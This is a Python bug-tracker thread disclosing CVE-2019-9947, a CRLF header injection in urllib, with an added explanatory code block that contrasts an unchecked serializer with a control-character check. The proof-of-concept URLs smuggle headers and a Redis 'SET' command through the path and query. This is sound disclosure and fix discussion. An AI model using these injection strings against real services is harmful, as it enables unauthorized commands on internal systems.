[CVE-2019-9947] Header Injection in urllib #80087
Comments
This patch can also be broken via the path and query string. It can still succeed in injecting HTTP headers, and is more critical because it bypasses the illegal-header check.

# Vulnerability PoC

>>> import urllib.request
>>> urllib.request.urlopen('http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n')

or

>>> urllib.request.urlopen('http://127.0.0.1:1234/HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n')

We can inject headers completely.

## Redis

>>> import urllib2
>>> urllib2.urlopen('http://127.0.0.1:6379/?q=HTTP/1.1\r\nSET VULN POC\r\nHeader2:\r\n').read()
'$-1\r\n+OK\r\n-ERR unknown command `Header2:`, with args beginning with: `HTTP/1.1`, \r\n-ERR unknown command `Accept-Encoding:`, with args beginning with: `identity`, \r\n'

$ redis-cli
127.0.0.1:6379> GET VULN
"POC"

# Root Cause

It succeeds in parsing the host because of re.DOTALL. The version of that commit was 3.4.7+; this vulnerability affects 3.4.7+ ~ 3.8-dev (I tested it). Maybe all higher versions after the commit can trigger this vulnerability.

# Conclusion

(Although this vulnerability is old, dating from 12 Jul 2017, I don't know why no one has submitted an issue until now XDD)
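The mechanics behind the PoC above, as an added example that is not the reporter's code and not CPython's: a naive request serialiser in the style of a pre-fix `http.client.putrequest` (request target dropped verbatim onto the request line), beside the same serialiser with a control-character check that refuses the URL instead of rewriting it. `split_url` is a deliberately simplistic stand-in, because `urllib.parse.urlsplit` in current CPython strips CR/LF and would hide the effect; its `.strip()` mirrors `urllib.parse.unwrap`, which is why the trailing CRLF in the PoC URLs vanishes and the `' HTTP/1.1'` suffix lands on the last injected line (`Header2: HTTP/1.1`), matching the Redis error text quoted in the PoC. The character class `[\x00-\x20\x7f]` is recalled from the bpo-30458 fix and is an assumption here; the two URLs are the PoC's own.

```python
import re

# Control-character class used by the check CPython added to
# http.client.putrequest for bpo-30458 (assumption: quoted from memory).
_DISALLOWED_URL_PCHAR = re.compile(r'[\x00-\x20\x7f]')

# Constructed inputs: the two URLs from the PoC above.
HTTP_POC_URL = 'http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n'
REDIS_POC_URL = 'http://127.0.0.1:6379/?q=HTTP/1.1\r\nSET VULN POC\r\nHeader2:\r\n'


def split_url(url):
    """Deliberately naive splitter (hypothetical helper, not urllib's).
    urllib.parse.urlsplit in current CPython strips CR/LF, which would hide
    the bug being illustrated. The .strip() mirrors urllib.parse.unwrap(),
    which urllib.request.Request applies to the URL."""
    url = url.strip()
    _scheme, rest = url.split('://', 1)
    netloc, sep, path = rest.partition('/')
    return netloc, (sep + path) or '/'


def serialize_request(method, url, headers, validate):
    """Serialise a request the way a pre-fix http.client did: the request
    target goes onto the request line unchanged. With validate=True the
    control-character check runs first and the request is refused."""
    netloc, target = split_url(url)
    if validate:
        match = _DISALLOWED_URL_PCHAR.search(target)
        if match:
            raise ValueError("URL can't contain control characters: %r (found %r)"
                             % (target, match.group()))
    lines = ['%s %s HTTP/1.1' % (method, target), 'Host: %s' % netloc]
    lines += ['%s: %s' % item for item in headers.items()]
    return ('\r\n'.join(lines) + '\r\n\r\n').encode('latin-1')


def wire_lines(raw):
    """The byte stream as a line-oriented peer (HTTP server, Redis inline
    protocol) sees it: one element per CRLF-terminated line of the head."""
    head = raw.split(b'\r\n\r\n', 1)[0]
    return head.split(b'\r\n')


def parse_headers(raw):
    """Minimal server-side view: request line plus a name -> value header dict."""
    request_line, *header_lines = wire_lines(raw)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b':')
        headers[name.strip().decode()] = value.strip().decode()
    return request_line.decode(), headers


def demo_injection():
    """Unchecked: the attacker's 'Header: Value' arrives as a real header,
    and the ' HTTP/1.1' suffix is glued onto the last injected line."""
    raw = serialize_request('GET', HTTP_POC_URL,
                            {'Accept-Encoding': 'identity'}, validate=False)
    return parse_headers(raw)


def demo_redis_lines():
    """Unchecked: against a line-oriented protocol the same trick yields a
    bare 'SET VULN POC' line, which Redis executes as a command."""
    raw = serialize_request('GET', REDIS_POC_URL,
                            {'Accept-Encoding': 'identity'}, validate=False)
    return wire_lines(raw)


def demo_hardened():
    """Checked: the request is refused before anything reaches the wire.
    Returns the error message, or None if (wrongly) nothing was raised."""
    try:
        serialize_request('GET', HTTP_POC_URL, {}, validate=True)
    except ValueError as exc:
        return str(exc)
    return None


if __name__ == '__main__':
    print(demo_injection())
    print(demo_redis_lines())
    print(demo_hardened())
```

Raising rather than percent-encoding is the choice the later comments lean towards: a rewritten URL silently reaches a different resource, while an exception surfaces the bad input at the caller.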
Hi all, not sure this is the right way to fix this, but here is a PR. I am interested in your feedback. Thank you.

Sorry, I'm late.
Maybe related to Victor's "Issue 1" described in bpo-32085. That is also a security bug about CRLF in the URL's path, but was opened before bpo-30500 was opened and the code changed, so I'm not sure if it is the same as this or not. Also there is bpo-13359, a proposal to automatically percent-encode invalid URLs. For a security fix, I'm not sure but it might be safer to raise an exception, rather than rewriting the invalid URL to a valid one.

Yes, I thought so. Before the commit version I said, the previous version(

According to https://bugzilla.redhat.com/show_bug.cgi?id=1695572, the CVE-2019-9947 has been assigned to this issue.

My fix proposed in bpo-30458 fixes this issue. I do not think this one deserved its own CVE; at least https://nvd.nist.gov/vuln/detail/CVE-2019-9947's current text also points to the other one.